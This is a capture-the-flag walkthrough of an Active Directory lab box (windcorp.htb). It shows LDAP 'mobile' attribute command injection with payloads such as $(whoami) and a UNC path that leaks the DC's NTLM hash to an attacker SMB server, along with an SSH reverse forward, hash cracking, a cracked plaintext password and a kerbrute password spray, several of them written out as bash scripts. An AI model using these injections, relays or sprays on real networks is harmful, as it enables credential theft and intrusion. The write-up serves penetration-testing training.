Enumeration

root@webserver:~# ./nmap -T4 hope.windcorp.htb

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2025-02-13 06:05 CET
Unable to find nmap-services!  Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for hope.windcorp.htb (192.168.0.2)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (-0.010s latency).
Other addresses for hope.windcorp.htb (not scanned): 10.10.11.179
Not shown: 1148 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
88/tcp  open  kerberos
389/tcp open  ldap
445/tcp open  microsoft-ds
464/tcp open  kpasswd
636/tcp open  ldaps
MAC Address: 00:15:5D:10:93:01 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 15.01 seconds

Enumeration as Ray.Duncan

SMB

  • Retrieves the current user's AD information

    • It uses the ADSystemInfo COM object to get the Distinguished Name (DN) of the currently logged-in user.

    • Then it binds to that user's Active Directory object over LDAP.

  • Creates a simple Windows Forms GUI

    • A small popup window appears titled "SMS password reset setup".

    • The form tells the user to keep their mobile number up to date for password resets.

    • It has a text box pre-filled with the user's current mobile number (read from AD).

    • Two buttons:

      • OK → saves the new number to AD.

      • Cancel → closes the form without saving.

  • Updates the user's mobile number in AD

    • If the user clicks OK, the script writes the new value into the "mobile" attribute.

  • The script runs on Windows and needs an account that is allowed to write that attribute. By default AD grants SELF write access to the Personal Information property set, which includes mobile, so an ordinary domain user can change their own number with or without this form.

  • Uses Windows Forms (System.Windows.Forms) to create the GUI.

  • Uses the ADSystemInfo COM object to fetch user details.

Command Injection - LDAPmodify

Now we can try binding to LDAP ourselves and modifying the "mobile" attribute of the ray.duncan user directly, without going through the form.

The base DN is DC=windcorp,DC=htb.

We need the DN for ray.duncan:

The mobile number is at the end of the entry.

We can now use ldapmodify to alter the mobile number for Ray Duncan.

Checking it again we see:

We saw some entries in the WC-Share debug-users.txt file with usernames and numbers. Going back to check it:

The number changed there too. So something, presumably a scheduled PowerShell script, periodically queries LDAP for the phone numbers and writes them to the file for debugging. What if we give it a command instead of a phone number?

Replacing the number with $(whoami). We are injecting code into an LDAP attribute and hoping that, when the script pulls the value and writes it into debug-users.txt, PowerShell evaluates the subexpression. After the modification the attribute looks like this:

Sure enough, we get this:

It runs as windcorp\scriptrunner.

The next step is to make it run a command that gives us a reverse shell.

First way

Unfortunately, the script seems to be running under PowerShell Constrained Language Mode (CLM). CLM blocks most .NET type usage, including New-Object on arbitrary types such as System.Net.Sockets.TCPClient, which the usual reverse-shell one-liners depend on. We can confirm it by running this command in PowerShell:

So injecting it into LDAP:

Checking inside debug-users.txt:

Second way

Can we make it leak the NTLM hash instead? I start an SMB server on my machine:

The command to inject (keeping the escape characters in mind):

Which makes it:

We do get connections, but no credentials.
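The three injections so far (the whoami probe, the CLM check and the UNC read) share one mechanic: write an LDIF that replaces the mobile attribute and let the script on the DC evaluate the value. What follows is an added example, not the writeup's own commands. It assumes Ray Duncan's DN, a Kerberos bind (kinit as ray.duncan, then -Y GSSAPI) and the share and file name in the UNC path; none of these are given on the page. The LDAP host is the one from the scan. The base64 branch covers values LDIF cannot carry in the plain "attr: value" form.

```bash
#!/usr/bin/env bash
# Added example, not the original writeup's commands.
# ASSUMED: the DN of ray.duncan, a Kerberos bind, and the share/file in PAYLOAD_UNC.
set -euo pipefail

LDAP_URI="ldap://hope.windcorp.htb"                        # host from the nmap scan
TARGET_DN="CN=Ray Duncan,CN=Users,DC=windcorp,DC=htb"      # ASSUMED DN

# needs_base64 VALUE: RFC 2849 requires 'attr:: <base64>' when the value starts
# with a space, ':' or '<', ends with a space, or contains a newline or any
# byte outside printable ASCII.
needs_base64() {
  case $1 in
    ' '*|':'*|'<'*|*' '|*$'\n'*) return 0 ;;
  esac
  printf '%s' "$1" | LC_ALL=C grep '[^ -~]' >/dev/null
}

# build_mobile_ldif DN VALUE: LDIF that replaces the mobile attribute with VALUE.
build_mobile_ldif() {
  local dn=$1 value=$2
  printf 'dn: %s\nchangetype: modify\nreplace: mobile\n' "$dn"
  if needs_base64 "$value"; then
    printf 'mobile:: %s\n' "$(printf '%s' "$value" | base64 | tr -d '\n')"
  else
    printf 'mobile: %s\n' "$value"
  fi
}

# Payloads. Single quotes stop bash from expanding $( ) locally; the expansion
# must happen on the DC, inside the PowerShell script that reads the attribute.
PAYLOAD_WHOAMI='$(whoami)'
PAYLOAD_CLM='$($ExecutionContext.SessionState.LanguageMode)'   # standard CLM check
PAYLOAD_UNC='$(Get-Content \\webserver.windcorp.htb\share\x)'  # share and file ASSUMED

# push_mobile VALUE: write the attribute as ray.duncan (needs a kinit'd ticket).
push_mobile() {
  build_mobile_ldif "$TARGET_DN" "$1" | ldapmodify -H "$LDAP_URI" -Y GSSAPI
}

# read_mobile: show the attribute so the write can be confirmed before waiting
# for debug-users.txt to change.
read_mobile() {
  ldapsearch -LLL -H "$LDAP_URI" -Y GSSAPI -b "$TARGET_DN" -s base mobile
}

# Example session (not run here):
#   kinit ray.duncan@WINDCORP.HTB
#   push_mobile "$PAYLOAD_WHOAMI" && read_mobile
```

The quoting is the part that bites: if the payload is double-quoted in the shell, `$(whoami)` is expanded on the Linux box and the DC only ever sees the local username.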

Reason

By default the SMB client on the Windows side tries NTLMv2 to authenticate to our SMB server.

This domain restricts outgoing NTLM to servers that are not domain joined (or that have no SPN). A bare IP address as the UNC target therefore won't work; we need the FQDN of a domain-joined host. Luckily our Linux machine is domain joined and has the FQDN webserver.windcorp.htb. The relevant policies are:

  • Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers

    • Controls whether NTLM credentials can be sent to remote servers. Setting this to “Deny” prevents sending NTLM to non-domain targets (or targets lacking a proper SPN).

  • Network security: Restrict NTLM: Incoming NTLM traffic

    • Governs which NTLM authentication attempts are accepted by the local machine. This can restrict NTLM logons coming into the system.

  • Network security: LAN Manager authentication level

    • Determines which authentication protocols (NTLMv1, NTLMv2, or LM) are used. For example, setting it to “Send NTLMv2 response only; Refuse LM & NTLM” forces the use of NTLMv2 (or Kerberos, if available).

  • Network security: Restrict NTLM: Audit NTLM authentication in this domain

    • Enables auditing of NTLM usage so you can see which accounts or systems are using NTLM authentication.

We can confirm our hostname:

Work around

Running smbserver.py opens TCP port 445 on our machine.

The Get-Content that runs on the DC has to point at the Linux machine's FQDN, so the DC sends its NTLM handshake to the Linux VM's port 445; from there we forward it to port 445 on our own machine.

The query should look like this:

And the port forward:

It didn't work at first. The Linux machine has to listen on 192.168.0.100 port 445, not only on localhost:

It should be 192.168.0.100:445 instead of 127.0.0.1:445.

On the far right we see that the listener belongs to sshd, so the bind address of the remote forward is decided by the sshd configuration. We open /etc/ssh/sshd_config and edit it, making

Then restart the service:

That fixes it. Don't forget to start the -R forward again.
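The workaround above, as an added example that is not part of the original writeup: fix the sshd option that decides where remote forwards bind, verify it, and check an `ss -tln` listing for a port that the DC can actually reach. The SSH user on webserver is assumed, the config path is the usual default, and the `ss` listings are constructed to mirror the before/after state described above.

```bash
#!/usr/bin/env bash
# Added example, not the writeup's own commands. Makes sshd on the
# domain-joined Linux host bind remote forwards on all interfaces, verifies
# it, and checks an `ss -tln` listing for a port reachable from the LAN.
# ASSUMED: the SSH user on webserver; the config path is the usual default.
set -euo pipefail

# enable_gateway_ports CONFIG: leave exactly one 'GatewayPorts yes' line.
# Any existing GatewayPorts line (commented or not) is dropped first, so the
# result does not depend on which of several copies sshd would honour.
enable_gateway_ports() {
  local cfg=$1 tmp
  tmp=$(mktemp)
  grep -Eiv '^[[:space:]]*#?[[:space:]]*GatewayPorts([[:space:]]|$)' "$cfg" >"$tmp" || true
  printf 'GatewayPorts yes\n' >>"$tmp"
  cat "$tmp" >"$cfg" && rm -f "$tmp"     # keep the original file's permissions
}

# gateway_ports_enabled CONFIG: 0 if the first effective GatewayPorts value lets
# a remote forward bind beyond loopback (sshd honours the first occurrence).
gateway_ports_enabled() {
  local v
  v=$(awk 'tolower($1)=="gatewayports"{print tolower($2); exit}' "$1")
  [ "$v" = yes ] || [ "$v" = clientspecified ]
}

# port_reachable_from_lan SS_OUTPUT PORT: 0 if PORT is in LISTEN state on an
# address other than loopback (a specific interface address, 0.0.0.0, [::] or *).
port_reachable_from_lan() {
  printf '%s\n' "$1" | awk -v p="$2" '
    $1=="LISTEN" {
      n=split($4, a, ":")
      if (a[n]!=p) next
      addr=substr($4, 1, length($4)-length(p)-1)
      if (addr!="127.0.0.1" && addr!="[::1]") found=1
    }
    END { exit found?0:1 }'
}

# Constructed `ss -tln` listings: the broken state and the fixed state on webserver.
SS_BEFORE='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    127.0.0.1:445      0.0.0.0:*
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*'
SS_AFTER='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    192.168.0.100:445  0.0.0.0:*
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*'

# start_reverse_forward: run on the attacker box, with smbserver.py already on
# local port 445. webserver:445 then lands on our SMB server, so the DC can be
# pointed at \\webserver.windcorp.htb\... and its NTLM handshake reaches us.
start_reverse_forward() {
  ssh -N -R 445:127.0.0.1:445 "${SSH_USER:-root}@webserver.windcorp.htb"
}

# On webserver, as root (not run here):
#   enable_gateway_ports /etc/ssh/sshd_config && systemctl restart ssh
#   port_reachable_from_lan "$(ss -tln)" 445 && echo "445 reachable from the DC"
```

With the default `GatewayPorts no`, sshd ignores any bind address the client asks for and puts the remote forward on 127.0.0.1, which is exactly the 127.0.0.1:445 listener seen above; `yes` forces the wildcard address, `clientspecified` lets the `-R` argument choose.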

We immediately get a hash. Cracking it with hashcat (NetNTLMv2 is mode 5600):

scriptrunner:!@p%i&J#iNNo1T2

This user doesn't give us any extra privileges.

Password Spray

But we do have a password that we can spray against other usernames. First we need to enumerate usernames.

Now I couldn't run kerbrute through proxychains, so I had to get the binary and run it on the VM.

We find that this password is valid for Bob.Wood.
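The spray as an added example, not the writeup's commands: build a username list from the debug-users.txt contents, validate it with kerbrute, spray the cracked password and pull the hits out of the output. The file format ("username number" per line) is assumed, since the page only says the file holds usernames and numbers, and the kerbrute output is constructed from its "[+] VALID LOGIN:" line format.

```bash
#!/usr/bin/env bash
# Added example, not the writeup's commands.
# ASSUMED: debug-users.txt lines look like "username number"; KERBRUTE_OUT is
# constructed from kerbrute's "[+] VALID LOGIN:" line format.
set -euo pipefail

DOMAIN=windcorp.htb
DC=hope.windcorp.htb
PASSWORD='!@p%i&J#iNNo1T2'    # cracked scriptrunner password; single quotes keep ! and # literal

# Constructed stand-in for the share file (format assumed).
DEBUG_USERS='scriptrunner 555-0100
Ray.Duncan 555-0101
bob.wood 555-0102
BOB.WOOD 555-0102
ray.duncan $(whoami)'

# usernames_from_debug: first field per line, lower-cased, deduplicated, minus
# the accounts we already hold. Kerberos principals are case-insensitive, so the
# lower-casing only avoids spraying the same account twice.
usernames_from_debug() {
  awk 'NF { print tolower($1) }' | sort -u | grep -vxF -e scriptrunner -e ray.duncan
}

# valid_logins: user names from kerbrute passwordspray output.
valid_logins() {
  grep 'VALID LOGIN' | awk '{ print $NF }' | cut -d@ -f1
}

# Constructed kerbrute passwordspray output.
KERBRUTE_OUT='2025/02/13 07:10:03 >  [+] VALID LOGIN:  bob.wood@windcorp.htb:!@p%i&J#iNNo1T2
2025/02/13 07:10:03 >  Done! Tested 2 logins (1 successes) in 1.900 seconds'

# spray USERS_FILE: run on the VM (kerbrute did not cooperate with proxychains).
# userenum drops names that do not exist before the spray touches them.
spray() {
  local users=$1
  ./kerbrute userenum -d "$DOMAIN" --dc "$DC" "$users"
  ./kerbrute passwordspray -d "$DOMAIN" --dc "$DC" "$users" "$PASSWORD" | valid_logins
}

# Usage (not run here):
#   printf '%s\n' "$DEBUG_USERS" | usernames_from_debug > users.txt
#   spray users.txt
```

One password against many accounts is a single failed attempt per account, so it stays well under any sane lockout threshold; the reverse (many passwords, one account) is what locks people out.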

WinRM as Bob

Finally we can WinRM into the DC as Bob.Wood using a Kerberos ticket requested with kinit.

Again we see that it's in CLM.
